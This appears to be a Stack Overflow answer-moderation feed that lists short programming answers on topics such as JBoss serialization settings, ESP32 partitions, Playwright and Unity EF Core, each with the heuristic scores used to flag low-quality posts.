Date: 2024-12-17 21:38:56
Score: 3
Natty:
Report link

مسلسل: "بوليس حالة مش عادية"

الحلقة 1: البداية الغامضة

المشهد 1:

المشهد 2:

المشهد 3:

المشهد 4:


الحلقة 2: غموض جديد

المشهد 1:

المشهد 2:

المشهد 3:


الحلقة 3: العودة للماضي

المشهد 1:

المشهد 2:

المشهد 3:


الحلقة 4: المطاردة الساخرة

المشهد 1:

المشهد 2:


الحلقة 6: "الانتقام الممنوع"

المشهد 1:

المشهد 2:

المشهد 3:


الحلقة 7: "القرار الصعب"

المشهد 1:

المشهد 2:

المشهد 3:


الحلقة 8: "فخ الخيانة"

المشهد 1:

المشهد 2:

المشهد 3:


الحلقة 9: "الاختراق الكبير"

المشهد 1:

المشهد 2:

المشهد 3:


الحلقة 10: "القنبلة الموقوتة"

المشهد 1:

المشهد 2:

المشهد 3:


الحلقة 11: "الاختراق المزدوج"

المشهد 1:

المشهد 2:

المشهد 3:


الحلقة 12: "العدو المخفي"

المشهد 1:

المشهد 2:

المشهد 3:


الحلقة 13: "الحرب الرقمية"

المشهد 1:

المشهد 2:

المشهد 3:


الحلقة 14: "الفخ الكبير"

المشهد 1:

المشهد 2:

المشهد 3:


الحلقة 15: "الابتزاز الكبير"

المشهد 1:

المشهد 2:

المشهد 3:


الحلقة 16: "الجريمة المزدوجة"

المشهد 1:

المشهد 2:

المشهد 3:


الحلقة 17: "الرسالة المجهولة"

المشهد 1:

المشهد 2:

المشهد 3:


الحلقة 18: "الخيانة الأخيرة"

**

المشهد 1:**

المشهد 2:

المشهد 3:


الحلقة 19: "العدو في الداخل"

المشهد 1:

المشهد 2:

المشهد 3:


الحلقة 20: "الاسترداد"

المشهد 1:

المشهد 2:

المشهد 3:


النهاية

يختتم المسلسل "بوليس حالة مش عادية" بمشاهد مؤثرة تظهر الفريق وقد اجتازوا كل التحديات وأثبتوا أنهم لا يقهرون في وجه الجريمة.

Reasons:
  • Long answer (-1):
  • No code block (0.5):
  • No latin characters (2.5):
  • Low reputation (1):
Posted by: Youssef Gueblaoui

79289414

Date: 2024-12-17 21:35:56
Score: 0.5
Natty:
Report link

you're looking for substring()

Reasons:
  • Low length (2):
  • Has code block (-0.5):
  • Has no white space (0.5):
  • Single line (0.5):
  • High reputation (-2):
Posted by: Kashyap

79289409

Date: 2024-12-17 21:33:54
Score: 14.5
Natty: 7.5
Report link

I have the same problem. May I ask did u solve the problem?

Reasons:
  • Blacklisted phrase (1): I have the same problem
  • Blacklisted phrase (1): May I ask
  • RegEx Blacklisted phrase (3): did u solve the problem
  • RegEx Blacklisted phrase (1.5): solve the problem?
  • Low length (1.5):
  • No code block (0.5):
  • Me too answer (2.5): I have the same problem
  • Ends in question mark (2):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Rachel Duan

79289404

Date: 2024-12-17 21:30:53
Score: 3.5
Natty:
Report link

Use InkWell Widget above the button instead of onPressed attribute

Reasons:
  • Low length (1.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Osama Mohamed

79289402

Date: 2024-12-17 21:30:53
Score: 0.5
Natty:
Report link

Using VS 2022 17.12.13, but this occurred in an earlier 2022 version, not sure which. Did a clean install trying to fix this.

My setup may be rare, I have only the “.NET desktop development” workload installed.

When trying to publish to a folder using the "Folder" option, the process fails silently. VS says “Publish succeeded” but no files are created.

When trying to publish to a folder using the "ClickOnce" option, get this error message, and no files are created: Could not find a part of the path 'D:\Dev\xxxx\bin\Release\net8.0-windows\app.publish'.

Workaround: I tried everything mentioned here and many other posts, no help. Finally tried adding the “Windows application development” workload. Making no other changes, tried publishing the original project again. Success!

Later, I removed the “Windows application development” workload. Publishing still works. Perhaps VS tracks workload components like Windows tracks dlls, and didn't remove publishing since it is (should be) part of the original workload.

Reasons:
  • Long answer (-1):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Mike Palandri

79289398

Date: 2024-12-17 21:29:52
Score: 5
Natty:
Report link

I have same issue in my case. But I could find no solution. Anyone who can solve this problem.

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Me too answer (2.5): I have same issue
  • Low reputation (1):
Posted by: SukKwon Oh

79289395

Date: 2024-12-17 21:28:51
Score: 4
Natty: 4
Report link

IDK what version you are using but 19c at least this is an online operation.

Reasons:
  • Low length (1.5):
  • No code block (0.5):
  • Unregistered user (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Michael C

79289383

Date: 2024-12-17 21:21:49
Score: 4.5
Natty: 5.5
Report link

I'm stuck in the same question! I think do we have to signe the Azure account to create a gateway!

Anybody has a solution? :'(

Reasons:
  • RegEx Blacklisted phrase (1.5): I'm stuck
  • Low length (1):
  • No code block (0.5):
  • Contains question mark (0.5):
  • Low reputation (1):
Posted by: Yúri Faro

79289378

Date: 2024-12-17 21:18:47
Score: 4.5
Natty:
Report link

symfony serve -d —allow-all-ip

Reasons:
  • Low length (2):
  • No code block (0.5):
  • Has no white space (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Rui Araújo

79289377

Date: 2024-12-17 21:17:47
Score: 1
Natty:
Report link

The alternative to serial mode is parallel mode, which is Playwright's default mode.

Now, if you want to run your tests in parallel mode, you have to design them in a way that there are no dependencies between the tests.

For example, in the first test, I visit a URL and perform an action, and in the subsequent test, I need to perform a follow-up action based on the previous test's result.

Sounds like these tests are not independent. That means you won't be able to run them in parallel and have to rely on serial mode.

It's almost certainly possible to refactor your tests into a form where they are independent. Here are some general tips for achieving this:

Reasons:
  • Blacklisted phrase (0.5): I need
  • Long answer (-1):
  • No code block (0.5):
  • Low reputation (1):
Posted by: mwopitz

79289371

Date: 2024-12-17 21:16:46
Score: 2
Natty:
Report link

These methods or classes that's causing these errors might have either changed or been removed when upgrading Spring Boot.

If you haven't done any of the following, try doing these:

Hope this advice helps!

P.S.This is my first StackOverFlow contribution :)

Reasons:
  • Blacklisted phrase (1): StackOverFlow
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Dan Skelly

79289367

Date: 2024-12-17 21:15:44
Score: 6 🚩
Natty:
Report link

Were you able to fix this? I'm running into the same issue, and all I can find is that Cloud Run only supports HTTP and HTTPS communication (even though you can use service probes in TCP)

Reasons:
  • Whitelisted phrase (-1.5): you can use
  • RegEx Blacklisted phrase (1.5): fix this?
  • RegEx Blacklisted phrase (3): Were you able
  • Low length (0.5):
  • No code block (0.5):
  • Contains question mark (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Micaela Percovich

79289358

Date: 2024-12-17 21:08:43
Score: 4.5
Natty:
Report link

make sure you @RenderBody() in _Layout.cshtml is not in tag

Reasons:
  • Low length (1.5):
  • No code block (0.5):
  • User mentioned (1): @RenderBody
  • Single line (0.5):
  • Low reputation (1):
Posted by: Abdul Naser

79289354

Date: 2024-12-17 21:06:42
Score: 3
Natty:
Report link

"The available tools can download 360 degree videos from Youtube and 360 photos from Facebook".

What available tools are you referring to ? There used to be a Chrome extension called Azimuth for 360 photos but it doesn't work anymore. Thanks !

Reasons:
  • Blacklisted phrase (0.5): Thanks
  • Low length (0.5):
  • No code block (0.5):
  • Contains question mark (0.5):
  • Low reputation (1):
Posted by: web van

79289353

Date: 2024-12-17 21:04:41
Score: 1.5
Natty:
Report link

I got the same error argument "destdir" is missing, with no default using download.packages() then no error when I installed the same package using install.packages().

Lucky work around because I'm troubleshooting on my work computer. Unsure if this works the other way.

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Unregistered user (0.5):
  • Low reputation (1):
Posted by: Brett

79289346

Date: 2024-12-17 21:01:41
Score: 2
Natty:
Report link

You need special "checked" builds of the jit to enable dumping -- these are not distributed as part of the product, so the only sure way to get one is to build it for yourself.

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
Posted by: Andy Ayers

79289345

Date: 2024-12-17 21:01:41
Score: 0.5
Natty:
Report link

.NET 6 just reached end of life, so you need to use .NET 8 SDK and VS2022.

Reasons:
  • Low length (1.5):
  • No code block (0.5):
  • Single line (0.5):
  • High reputation (-2):
Posted by: Lex Li

79289341

Date: 2024-12-17 20:58:39
Score: 6.5 🚩
Natty: 5.5
Report link

@akdev I get 403 Forbidden error but couldn't follow your solution because I was not able to locate the .m3u8 entry. Not sure if the policy allows to share the video link here. Please let me know if any further details needed.

Reasons:
  • Blacklisted phrase (1): video link
  • RegEx Blacklisted phrase (2.5): Please let me know
  • Low length (0.5):
  • No code block (0.5):
  • User mentioned (1): @akdev
  • Low reputation (1):
Posted by: Sobi

79289332

Date: 2024-12-17 20:53:37
Score: 1.5
Natty:
Report link

yes,It does exist.

from datetime import datetime
def greet4():
    return f"The current date and time are {str(datetime.now())}."

If function returns a value instead of print and display.Checkout the link https://_12.pyscriptapps.com/user-inputs-copy-copy/latest/

Reasons:
  • Probably link only (1):
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: nasrin begum pathan

79289329

Date: 2024-12-17 20:51:37
Score: 1.5
Natty:
Report link

Ok I found the solution (I'm stupid ^^ )

Here are the actions I've follow

and compile ...

Sorry for my stupid questions :(

Reasons:
  • Blacklisted phrase (1): stupid question
  • Blacklisted phrase (1): :(
  • Whitelisted phrase (-2): I found the solution
  • No code block (0.5):
  • Self-answer (0.5):
  • Low reputation (0.5):
Posted by: Miguel Martin Perez

79289321

Date: 2024-12-17 20:49:36
Score: 4
Natty:
Report link

Question is too broad for this website.

Reasons:
  • Low length (2):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: qater

79289316

Date: 2024-12-17 20:47:35
Score: 0.5
Natty:
Report link

FYI, cargo-script is in the process of being integrated into cargo itself. It's already available for testing, and I'm sure the implementers would love if people tried it and reported any sharp edges.

https://github.com/rust-lang/cargo/issues/12207

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: Marcin

79289307

Date: 2024-12-17 20:44:34
Score: 3
Natty:
Report link

I was getting the same error. I had %%timeit and then import pandas as pd. When I deleted %%timeit, the pandas worked

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Naeemah Small

79289296

Date: 2024-12-17 20:38:32
Score: 1.5
Natty:
Report link

I had a Local account using a Microsoft Account Profile by pointing to the existing profile with Desktop, OneDrive assets in place Because the different account types default to Local or Roaming respectively [I think] things got ugly eventually & I had issues with Python, NPM, ReactJs etc

I Used netplwiz to set the Local folder to my c:\users\username Run sysdm.cpl then click User Profile to set your profile type to Roaming or Local

Clean up any Group Policy irregularity

Reasons:
  • No code block (0.5):
  • Low reputation (1):
Posted by: wmamudu

79289288

Date: 2024-12-17 20:35:32
Score: 3.5
Natty:
Report link

try to update the glue version to 4.0 or 5.0!

Reasons:
  • Low length (1.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: julibigdata

79289287

Date: 2024-12-17 20:34:31
Score: 3
Natty:
Report link

UUse command Symfony serve - d —allow-all-ip

For me it’s working on Mac

Reasons:
  • Low length (1.5):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Rui Araújo

79289284

Date: 2024-12-17 20:33:31
Score: 2.5
Natty:
Report link

I found the issue. I was connecting the micro SD card into the Raspberry Pi using micro SD card USB adapter. After inserting the micro SD card into the Raspberry Pi’s card slot, I was able to boot the QNX image successfully.

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Self-answer (0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: Hosein Zarifi

79289277

Date: 2024-12-17 20:29:30
Score: 0.5
Natty:
Report link

I'm currently dealing with the same project!

The topology is normal. Try modifying the ESP32 partition to fix this memory issue. Here is some reference: https://docs.espressif.com/projects/esp-idf/en/latest/esp32/api-guides/partition-tables.html

I tried this partition, and it works well:

# Name,   Type, SubType, Offset,  Size, Flags
# Note: if you have increased the bootloader size, make sure to update the offsets to avoid overlap
nvs,      data, nvs,     0x9000,  0x6000,
phy_init, data, phy,     0xf000,  0x1000,
factory,  app,  factory, 0x10000, 0x400000, 
model,    data,  ,       0x410000, 0x300000,  

Also check this issue in the esp-idf official repo: https://github.com/espressif/esp-idf/issues/12588

I have to say that i cannot make inferences yet, i am currently dealing with some micro op resolver issues, but the project can be built.

I hope this contribution helps you!

Reasons:
  • Blacklisted phrase (0.5): i cannot
  • Long answer (-0.5):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: Andres Guido

79289270

Date: 2024-12-17 20:25:29
Score: 1
Natty:
Report link

The above interactive solutions didn't work for me. Instead, I made a virtual environment (venv) for my workspace (activated), then followed the command line installation from here: https://www.nltk.org/data.html

python -m nltk.downloader all

I imagine I could have simply downloaded tokenizers.

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: Yarko

79289269

Date: 2024-12-17 20:24:29
Score: 2
Natty:
Report link

I know I'm two years late to this one, but I just spent days figuring this exact error out so here we go. I have an ancient JBoss EAP 5.x server I have to keep running long enough for the dev team to finish moving services out of it. (Why yes, I do work in enterprise, how could you tell?)

The root cause here is JBoss Serialization. Back in the Java 4-ish days JBoss created their own serialization implementation to be quicker than the one in the JVM. This worked fine until security fixes to deserialization appeared in later versions of Java 8, which broke the library. This is why even EAP 5.2.0 and 6.x break despite being originally built for Java 8, and why rolling back to earlier patch versions of the JVM works.

JBoss Serialization isn't really needed any more IMO, so the easy fix here is to disable it. In /deploy/ejb3-connectors-bean.xml, find the invokerLocator property of RemotingConnector and add the serializationType parameter to the invocation URL, like this:

  <bean name="org.jboss.ejb3.RemotingConnector"
    class="org.jboss.remoting.transport.Connector">

    <property name="invokerLocator">

      <value-factory bean="ServiceBindingManager"
        method="getStringBinding">
        <parameter>
          jboss.remoting:type=Connector,name=DefaultEjb3Connector,handler=ejb3
        </parameter>
        <parameter>
          <null />
        </parameter>
        <parameter>socket://${jboss.bind.address}:${port}?timeout=300000&amp;invokerDestructionDelay=5000&amp;serializationType=java</parameter>
        <parameter>
          <null />
        </parameter>
        <parameter>3873</parameter>
      </value-factory>

    </property>
    <property name="serverConfiguration">
      <inject bean="ServerConfiguration" />
    </property>
  </bean>

There's a similar definition in /deploy/remoting-jboss-beans.xml. I'm pretty sure that one's not used any more, but no harm in adding the parameter there too:

<bean name="UnifiedInvokerConfiguration" class="org.jboss.remoting.ServerConfiguration">
   <constructor>
      <!-- transport: Others include sslsocket, bisocket, sslbisocket, http, https, rmi, sslrmi, servlet, sslservlet. -->
      <parameter>socket</parameter>
   </constructor>
 
 
   <!-- Parameters visible to both client and server -->
   <property name="invokerLocatorParameters">
      <map keyClass="java.lang.String" valueClass="java.lang.String">
 
         <!-- Other map entries ... -->
          
         <entry><key>serializationType</key><value>java</value></entry>
 
      </map>
   </property>
    
</bean>

That should disable JBoss Serialization for all remote EJB invocations. However, I did find one more issue with Interceptors. The jboss-ejb3-core library contains two AOP interceptors that are designed to check if a service is accidentally calling itself via a remote binding, and turn that call into a local invocation instead. Good idea on the surface, but these interceptors do not have an equivalent of the serializationType parameter. They are hard-coded and will always use JBoss Serialization. Personally I consider this a bug, but JBoss 5.x ain't getting patches any time soon!

There are two pretty simple options to work around this. You can of course update your services to not call themselves and correctly use local bindings. That would be the preferred option, but obviously as a server admin it's hard to anticipate where these issues are present and we don't want to go breaking things that currently work.

The second option is that you simply disable the interceptors. This will have a negative performance impact on any service that incorrectly uses its own remote bindings, as those calls will actually get dispatched to the remoting server, but the upside is that the remoting server is now correctly configured to use JVM serialization! To disable the interceptors, open /deploy/ejb3-interceptors-aop.xml and just comment out IsLocalInterceptor and ClusteredIsLocalInterceptor in the Interceptor stacks:

<stack name="ServiceClientInterceptors">
   <!-- <interceptor-ref name="org.jboss.ejb3.remoting.IsLocalInterceptor"/> -->
   <interceptor-ref name="org.jboss.ejb3.security.client.SecurityClientInterceptor"/>
   <interceptor-ref name="org.jboss.aspects.tx.ClientTxPropagationInterceptor"/>
   <interceptor-ref name="org.jboss.aspects.remoting.InvokeRemoteInterceptor"/>
</stack>

<stack name="StatelessSessionClientInterceptors">
   <!-- <interceptor-ref name="org.jboss.ejb3.remoting.IsLocalInterceptor"/> -->
   <interceptor-ref name="org.jboss.ejb3.security.client.SecurityClientInterceptor"/>
   <interceptor-ref name="org.jboss.aspects.tx.ClientTxPropagationInterceptor"/>
   <interceptor-ref name="org.jboss.aspects.remoting.InvokeRemoteInterceptor"/>
</stack>

<stack name="StatefulSessionClientInterceptors">
   <!-- <interceptor-ref name="org.jboss.ejb3.remoting.IsLocalInterceptor"/> -->
   <interceptor-ref name="org.jboss.ejb3.security.client.SecurityClientInterceptor"/>
   <interceptor-ref name="org.jboss.aspects.tx.ClientTxPropagationInterceptor"/>
   <interceptor-ref name="org.jboss.aspects.remoting.InvokeRemoteInterceptor"/>
</stack>

<stack name="ClusteredStatelessSessionClientInterceptors">
   <!-- <interceptor-ref name="org.jboss.ejb3.remoting.ClusteredIsLocalInterceptor"/> -->
   <interceptor-ref name="org.jboss.ejb3.security.client.SecurityClientInterceptor"/>
   <interceptor-ref name="org.jboss.aspects.tx.ClientTxPropagationInterceptor"/>
   <interceptor-ref name="org.jboss.aspects.remoting.ClusterChooserInterceptor"/>
   <interceptor-ref name="org.jboss.aspects.remoting.InvokeRemoteInterceptor"/>
</stack>

<stack name="ClusteredStatefulSessionClientInterceptors">
   <!-- <interceptor-ref name="org.jboss.ejb3.remoting.ClusteredIsLocalInterceptor"/> -->
   <interceptor-ref name="org.jboss.ejb3.security.client.SecurityClientInterceptor"/>
   <interceptor-ref name="org.jboss.aspects.tx.ClientTxPropagationInterceptor"/>
   <interceptor-ref name="org.jboss.aspects.remoting.ClusterChooserInterceptor"/>
   <interceptor-ref name="org.jboss.aspects.remoting.InvokeRemoteInterceptor"/>
</stack>

Obviously this fix is for JBoss 5.x but hopefully it gives anyone reading this a starting point for where to look on later versions. I found a number of instances of people running into this issue around the net, but no concrete fixes, so as late as the reply is I hope it's still of use to someone.

Reasons:
  • RegEx Blacklisted phrase (2.5): could you tell
  • Long answer (-1):
  • Has code block (-0.5):
  • Contains question mark (0.5):
  • Low reputation (0.5):
Posted by: Silver Preece

79289266

Date: 2024-12-17 20:22:29
Score: 3.5
Natty:
Report link

Unity is very tricky for importing NuGet packages. Need to very careful and using only .NET Standard 2.0 or 2.1 versions of the NuGet packages. Also, EntityFrameworkCore requires database provider, such as SQLite provider to work properly. That triggers another chain of dependencies to include. Each platform has a unique sub-set of dependencies. To be honest that is really time consuming to make all of that to work.

That is why I made the bundle package, that would include all required dependencies for Unity project to let it work at least on these platforms: Windows, Android, iOS, MacOS. There is the bundle package - Unity + EFCore + SQLite.

Please let me know if you find any issues, I would be glad to polish it. It works for my project on all the mentioned platforms. Just please make sure you switched project to .NET Standard 2.0 or 2.1 as mentioned in the README.

Reasons:
  • RegEx Blacklisted phrase (2.5): Please let me know
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Ivan Murzak

79289261

Date: 2024-12-17 20:21:28
Score: 3
Natty:
Report link

I replaced + symbol to 00 and works with me

Reasons:
  • Low length (1.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: Ahmed Mohamed

79289254

Date: 2024-12-17 20:15:27
Score: 2.5
Natty:
Report link

I found I had to use the below for my tracking pixels to hide specifically on the outlook app on pixel phones

style="position:absolute; visibility:hidden"

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Low reputation (1):
Posted by: SerenaD

79289243

Date: 2024-12-17 20:11:26
Score: 3.5
Natty:
Report link

@DisplayNameFor(m => m.PropertyName) gets the text from the display name attribute in your viewmodel.

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
  • Looks like a comment (1):
  • Low reputation (0.5):
Posted by: PureJ

79289242

Date: 2024-12-17 20:11:26
Score: 3.5
Natty:
Report link

@DisplayNameFor(m => m.PropertyName) gets the text from the display name attribute in your viewmodel.

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
  • Looks like a comment (1):
  • Low reputation (0.5):
Posted by: PureJ

79289241

Date: 2024-12-17 20:11:26
Score: 3.5
Natty:
Report link

@DisplayNameFor(m => m.PropertyName) gets the text from the display name attribute in your viewmodel.

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
  • Looks like a comment (1):
  • Low reputation (0.5):
Posted by: PureJ

79289240

Date: 2024-12-17 20:11:26
Score: 1.5
Natty:
Report link

For the people here having this problem and actually are using VS Code, you should try installing it within a virtual environment.

I personally would recommend Python UV. Just follow the steps:

  1. Open CMD and type "pip install uv"
  2. Go to project folder and type on terminal "uv init"
  3. Now install the dependencies, always using "uv add" (ex: uv add pyautogui)
  4. Pyautogui will probably also ask you to install opencv so also type "uv add opencv-python"

Now you should be good to go.

Reasons:
  • No code block (0.5):
  • Low reputation (1):
Posted by: Arthur